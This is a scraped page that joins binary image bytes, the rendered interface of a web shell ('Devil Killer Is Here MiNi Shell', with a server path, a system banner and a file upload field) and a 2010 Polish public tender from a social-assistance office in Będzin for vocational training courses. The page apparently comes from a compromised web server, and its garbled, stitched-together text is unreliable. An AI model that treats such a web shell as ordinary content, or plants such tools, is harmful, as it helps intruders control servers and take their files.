JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101014/288021-N-2010.html

<p class="kh_header"><b>Będzin: zorganizowanie i przeprowadzenie niżej wymienionych  szkoleń zawodowych oraz indywidualnego wsparcia psychologicznego dla 42 nowych i 23 kontynuujących  Uczestników Projektu Rozwój i upowszechnienie form aktywnej integracji w MOPS Będzin</b><br>
<b>Numer ogłoszenia: 288021 - 2010; data zamieszczenia: 14.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. 11 Listopada 1, 42-500 Będzin, woj. śląskie, tel. 032 2674982; 7614760, 61, faks 032 2674982, 7614760, 7614761.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ----------</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie niżej wymienionych  szkoleń zawodowych oraz indywidualnego wsparcia psychologicznego dla 42 nowych i 23 kontynuujących  Uczestników Projektu Rozwój i upowszechnienie form aktywnej integracji w MOPS Będzin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> zorganizowanie i przeprowadzenie niżej wymienionych  szkoleń zawodowych oraz indywidualnego wsparcia psychologicznego dla 42 nowych i 23 kontynuujących  Uczestników Projektu Rozwój i upowszechnienie form aktywnej integracji w MOPS Będzin. Projekt  jest  współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. Przedmiot zamówienia będzie realizowany w okresie od listopada  2010r. do grudnia 2010r. 
Konsultacje indywidualne z psychologiem w wymiarze po 2 godziny na osobę dla nowych
i kontynuujących Projekt uczestników,
Zakres tematyczny
zniwelowanie barier psychologicznych występujących u osób nieaktywnych zawodowo,
wzmocnienie ich pewności siebie,
motywacja do aktywnej obecności na rynku pracy.    
Zamawiający wymaga aby konsultacje indywidualne z psychologiem odbywały się w siedzibie Zamawiającego w przygotowanych do tego celu salach.
                                                                                                                                                                                         
     Szczegółowy wykaz kursów wraz z liczbą godzin uczestników i liczbą godzin kursów dla nowych i kontynuujących Projekt Uczestników.
Opiekun osób starszych i dzieci 
1. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 160 godzin dla
12 Uczestników nowych zgodnie z poniższym programem
wykonywanie zabiegów pielęgnacyjno-higienicznych (m.in. pielęgnacja małego dziecka, pielęgnacja ran przewlekłych, pielęgnacja chorego leżącego w łóżku),
zasady żywienia dzieci, osób starszych,
rozwiązywanie problemów zdrowotnych (wieku rozwojowego, wieku geriatrycznego),
udzielanie pierwszej pomocy w stanach zagrożenia zdrowia (dziecka, osoby starszej),
 reanimacja, umiejętność prawidłowej opieki, 
zagospodarowanie wolnego czasu, współpraca z podopiecznym i jego rodziną, 
rozpoznawanie, klasyfikacja i eliminowanie czynników i sytuacji zagrażających zdrowiu
i bezpieczeństwu podopiecznego,
zapoznanie się z przepisami dotyczącymi bezpieczeństwa i higieny pracy podczas opieki nad
dzieckiem, osobą starszą i zajęcia praktyczne 
2. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 100 godzin dla
4 Uczestników kontynuujących Projekt zgodnie z poniższym programem z uwzględnieniem maksymalnie dużej liczy godzin zajęć praktycznych  na doskonalenie już nabytych umiejętności.
wykonywanie zabiegów pielęgnacyjno-higienicznych (m.in. pielęgnacja małego dziecka, pielęgnacja ran przewlekłych, pielęgnacja chorego leżącego w łóżku),
zasady żywienia dzieci, osób starszych,
rozwiązywanie problemów zdrowotnych (wieku rozwojowego, wieku geriatrycznego),
udzielanie pierwszej pomocy w stanach zagrożenia zdrowia (dziecka, osoby starszej),
 reanimacja, umiejętność prawidłowej opieki, 
zagospodarowanie wolnego czasu, współpraca z podopiecznym i jego rodziną, 
rozpoznawanie, klasyfikacja i eliminowanie czynników i sytuacji zagrażających zdrowiu i bezpieczeństwu podopiecznego i  zajęcia praktyczne .


 Profesjonalna obsługa biura
1. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 160 godzin dla
3 Uczestników nowych zgodnie z poniższym programem
organizacja stanowiska pracy,
stosunki interpersonalne w biurze,
efektywne zarządzanie czasem,
współpraca z szefem i jak wspierać jego autorytet,
tworzenie pozytywnego wizerunku firmy,
rozmowa i jej znaczenie,
korespondencja ( pisma, obieg korespondencji),
obsługa urządzeń biurowych ( fax, komputer, kopiarka),
obsługa klienta prze telefon, obsługa interesantów,
współpraca z otoczeniem zewnętrznym jednostki organizacyjnej,
przechowywanie i archiwizowanie informacji, dokumentów oraz akt spraw i zajęcia praktyczne. 
Bukieciarstwo, aranżacje roślinne i zdobienie przedmiotów techniką decoupage
1. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 160 godzin dla
3 Uczestników nowych zgodnie z poniższym programem
podstawowe pojęcia i zagadnienia z zakresu florystyki,
podstawowe narzędzia i akcesoria w pracy florysty,
pielęgnacja i obróbka kwiatów ciętych,
wiązanki okolicznościowe, bukiety, kompozycje z kwiatów ciętych, florystyka ślubna i żałobna,
kompozycje z kwiatów sztucznych i suszonych,
decoupage klasyczne,
technika serwetkowa,
zastosowanie papieru ryżowego na różnych powierzchniach,
techniki postarzania przedmiotów,
technika świecowania,
wykonanie drewnianej ramki na zdjęcia,
techniki cieniowania i zajęcia praktyczne. 
2. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 100 godzin dla
3 Uczestników kontynuujących Projekt zgodnie z poniższym programem z uwzględnieniem maksymalnie dużej liczy godzin zajęć praktycznych  pozwalających na doskonalenie już nabytych umiejętności. 
wiązanki okolicznościowe, bukiety, kompozycje z kwiatów ciętych, florystyka ślubna i żałobna,
kompozycje z kwiatów sztucznych i suszonych,
technika serwetkowa,
zastosowanie papieru ryżowego na różnych powierzchniach,
techniki postarzania przedmiotów,
technika świecowania,
wykonanie drewnianej ramki na zdjęcia,
techniki cieniowania i zajęcia praktyczne. 
Sprzedawca - fakturzysta z obsługą kasy fiskalnej
1. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 160 godzin dla
4 Uczestników nowych zgodnie z poniższym programem
organizacja pracy,
odpowiedzialność materialna,
kody kreskowe,
podatek od wartości dodanej, 
budowa elektronicznych kas sklepowych, 
ćwiczenia z wykorzystaniem elektronicznych kas fiskalnych,
techniki sprzedaży, elementy reklamy,
 poznanie ogólnych przepisów bhp obowiązujących w jednostce handlowej,
poznawanie otoczenia przedsiębiorstwa handlowego,
marketing i reklama w handlu detalicznym,
organizacja gospodarki magazynowej,
rozmieszczanie i przechowywanie towarów w jednostkach handlu detalicznego,
wypełnianie dokumentacji związanej ze sprzedażą,
obsługiwanie klienta z wykorzystaniem aktywnych metod sprzedaży,
dekorowanie wnętrza sklepu i okna wystawowego,
drukowanie raportów na kasie fiskalnej,
wystawianie faktur i rachunków i zajęcia praktyczne.
Malarz - tynkarz
1. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 160 godzin dla
1 Uczestnika nowego zgodnie z poniższym programem
wykonywanie murów nośnych, nadproży i stropów murarskich, ścianek działowych murarskich, tynków zwykłych dwuwarstwowych, robót izolacyjnych związanych z robotami murarskimi oraz robót pomocniczych,
przepisy bezpieczeństwa i higieny pracy, ppoż. i ochrony środowiska obowiązujące w zawodzie murarz,
dokumentacja techniczno-budowlana w zakresie robót murarskich i tynkarskich,
narzędzia, sprzęt i materiały budowlane stosowane w robotach murarskich, tynkarskich i izolacyjnych i zajęcia praktyczne. 
2. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 100 godzin dla
1 Uczestnika kontynuującego Projekt zgodnie z poniższym programem z uwzględnieniem maksymalnie dużej liczy godzin zajęć praktycznych  pozwalających na doskonalenie już nabytych umiejętności. 

wykonywanie murów nośnych, nadproży i stropów murarskich, ścianek działowych murarskich, tynków zwykłych dwuwarstwowych, robót izolacyjnych związanych z robotami murarskimi oraz robót pomocniczych,
dokumentacja techniczno-budowlana w zakresie robót murarskich i tynkarskich, 
narzędzia, sprzęt i materiały budowlane stosowane w robotach murarskich, tynkarskich i izolacyjnych i zajęcia praktyczne.     

Kucharz
1. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 160 godzin dla
8 Uczestników nowych zgodnie z poniższym programem
bezpieczeństwo i higiena pracy na stanowisku, 
planowanie ofert kulinarnych zgodnie z potrzebami i oczekiwaniami konsumentów oraz wymogami nauki o żywieniu,
sporządzanie potraw, półproduktów i napojów kulinarnych z uwzględnieniem wiedzy o żywności
i żywieniu,
przechowywanie surowców, półproduktów, gotowych wyrobów kulinarnych i napojów,
planowanie ofert kulinarnych zgodnie z potrzebami i oczekiwaniami konsumentów oraz wymogami nauki o żywieniu i  zajęcia praktyczne. 
2. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 100 godzin dla
7 Uczestników kontynuujących Projekt zgodnie z poniższym programem z uwzględnieniem maksymalnie dużej liczy godzin zajęć praktycznych  pozwalających na doskonalenie już nabytych umiejętności. 

sporządzanie potraw, półproduktów i napojów kulinarnych z uwzględnieniem wiedzy o żywności
i żywieniu,
przechowywanie surowców, półproduktów, gotowych wyrobów kulinarnych i napojów,
planowanie ofert kulinarnych zgodnie z potrzebami i oczekiwaniami konsumentów oraz wymogami nauki o żywieniu i  zajęcia praktyczne.
Kosmetyka i stylizacja paznokci 
1. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 160 godzin dla
2 Uczestników nowych zgodnie z poniższym programem
rozpoznanie przeciwwskazań do manicure i zabiegów pielęgnacyjnych dłoni,
organizowanie stanowiska pracy do wykonywania zabiegu manicure i zapoznanie się z narzędziami
do wykonywania zabiegu,
 wykonywanie masażu dłoni,
 wykonywanie zabiegu pielęgnacyjnego dłoni,
 wykonywanie zabiegu manicure,
malowanie płytki paznokciowej z zastosowaniem dowolnych technik zdobnictwa i zajęcia praktyczne.
Stylizacja dłoni i stóp z dodatkowym modułem odnowa biologiczna 
1. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 160 godzin dla
2 Uczestników nowych zgodnie z poniższym programem
przybliżenie i charakterystyka zawodu stylistki paznokci,
zasady higieny, dezynfekcji i sterylizacji obowiązujące w salonach kosmetycznych, 
budowa i charakterystyka paznokcia, choroby i defekty paznokci oraz skóry stóp i rąk, wskazania
i przeciwwskazania, 
zabiegi pielęgnacyjne skóry, dłoni i stóp, 
techniki manicure i pedicure (biologiczny, tradycyjny (cążkowy, SPA),
techniki przedłużania paznokci metodą akrylową żelową (na gipsie, na formie - frencz, dopełniania obu metod, użycie frezarki),
rodzaje tipsów kształty, kolory, rodzaje kieszeni,
 rodzaje pilników, gradacje i ich zastosowanie, 
zdobienie paznokci (metody i techniki zdobień) i zajęcia praktyczne. 
2. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 100 godzin dla
5 Uczestników kontynuujących Projekt zgodnie z poniższym programem z uwzględnieniem maksymalnie dużej liczy godzin zajęć praktycznych  pozwalających na doskonalenie już nabytych umiejętności. 
zabiegi pielęgnacyjne skóry, dłoni i stóp, 
techniki manicure i pedicure (biologiczny, tradycyjny cążkowy, SPA),
 techniki przedłużania paznokci metodą akrylową żelową (na gipsie, na formie - frencz, dopełniania obu metod, użycie frezarki,
rodzaje tipsów kształty, kolory, rodzaje kieszeni,
 rodzaje pilników, gradacje i ich zastosowanie, 
zdobienie paznokci (metody i techniki zdobień) i zajęcia praktyczne. 

Kadry, płace, ZUS z płatnikiem
1. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 160 godzin dla
1 Uczestnika nowego zgodnie z poniższym programem
Moduł Kadry 
organizacja komórki do spraw kadrowych, rekrutacja pracowników, adaptacja i doskonalenie zawodowe, wybrane zagadnienia prawa pracy i bhp.,
Moduł Płace 
organizacja pracy pracownika ds. płac, finanse, podatki, lista płac, ubezpieczenia społeczne, świadczenia na rzecz pracowników z tytułu ubezpieczeń społecznych, rozliczanie innych świadczeń niż wynagrodzenia ze stosunku pracy, zasiłki, rozliczanie funduszu pracy, gwarantowanych świadczeń pracowniczych,
Moduł Komputer 
obsługa programów użytkowych Płatnik i Symfonia - moduł kadrowo-płacowy,


Fryzjer 
1. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 160 godzin dla
1 Uczestnika nowego zgodnie z poniższym programem wykonywanie strzyżenia włosów,
wykonywanie golenia zarostu,
wykonywanie zabiegów pielęgnacyjno-leczniczych włosów i zarostu,
wykonywanie zabiegów chemiczno-upiększających włosów i zarostu,
wykonywanie zabiegów pielęgnacyjnych włosów i zarostu,
rozpoznawanie i charakteryzowanie rodzaju skóry i włosów,
czesanie i stylizacja fryzur,
wykonywanie zabiegów trwałego ondulowania,
farbowanie lub rozjaśnianie włosów, odrostów oraz zarostu,
organizowanie salonu fryzjerskiego i stanowiska pracy zgodnie z zasadami i przepisami  bezpieczeństwa i higieny pracy, ergonomii, ochrony,
nawiązywanie i utrzymywanie kontaktów zawodowych w usługach fryzjerskich,
prowadzenie dokumentacji związanej z funkcjonowaniem salonu fryzjerskiego i zajęcia praktyczne.
2. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 100 godzin dla
2 Uczestników kontynuujących Projekt zgodnie z poniższym programem z uwzględnieniem maksymalnie dużej liczy godzin zajęć praktycznych  pozwalających na doskonalenie już nabytych umiejętności. 

wykonywanie zabiegów trwałego ondulowania,
farbowanie lub rozjaśnianie włosów, odrostów oraz zarostu,
organizowanie salonu fryzjerskiego i stanowiska pracy zgodnie z zasadami i przepisami  bezpieczeństwa i higieny pracy, ergonomii, ochrony,
nawiązywanie i utrzymywanie kontaktów zawodowych w usługach fryzjerskich,
prowadzenie dokumentacji związanej z funkcjonowaniem salonu fryzjerskiego,

projektowanie fryzur i zarostu i zajęcia praktyczne.




Magazynier z obsługą komputera
1. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 160 godzin dla
3 Uczestników nowych zgodnie z poniższym programem
przestrzeganie przepisów bhp i ppoż podczas pracy w magazynie - hurtowni,
wykonywanie czynności związanych z przyjmowaniem towarów,
wykonywanie czynności reklamacyjnych w zakresie wad jakościowych, braków lub nadwyżek,
rozmieszczanie i układanie przyjętego towaru na wyznaczonej powierzchni magazynowej,
przechowywanie towarów zabezpieczających przed zepsuciem, zniszczeniem i kradzieżą,
wydawanie towarów z magazynu na podstawie dowodów rozchodowych,
prowadzenie dokumentacji magazynowej przy użyciu programów komputerowych,
ponoszenie odpowiedzialności materialnej za powierzone towary i środki,
sprawowanie nadzoru nad pracą podległych pracowników,
prowadzenie gospodarki opakowaniami w magazynie i zajęcia praktyczne.
Kierowca wózków jezdniowych z napędem silnikowym i egzamin państwowy
1. Wykonawca zobowiązany będzie do przeprowadzenia kursu (maksymalnie po 8 godzin lekcyjnych dziennie ( 1 godzina lekcyjna  45 minut) dla Uczestników Projektu, w wymiarze po 160 godzin dla
3 Uczestników nowych zgodnie z poniższym programem
typy stosowanych wózków jezdniowych, 
budowa wózka,
czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy wózkami, 
czynności operatora w czasie pracy wózkami,
wiadomości z zakresu ładunkoznawstwa,
wiadomości z zakresu bezpieczeństwa i higieny pracy,
praktyczna nauka jazdy i manewrowania osprzętem wózków..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 usługę dla co najmniej 10 osób odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia w danej części z podaniem jej wartości, przedmiotu, dat wykonania
i odbiorców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dysponowania osobami zdolnymi do wykonania zamówienia będzie spełniony jeżeli wykonawca wykaże, że:
dysponuje co najmniej 2 wykładowcami posiadającymi odpowiednie kwalifikacje (określone przepisami ) i minimum roczne doświadczenie w zakresie prowadzenia zajęć teoretycznych
i zajęć praktycznych objętym przedmiotem zamówienia w danej części;
dysponuje co najmniej 2 osobami posiadającymi wykształcenie wyższe na kierunku psychologia oraz posiadającymi co najmniej 2 letnie doświadczenie w zakresie indywidualnego wsparcia psychologicznego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
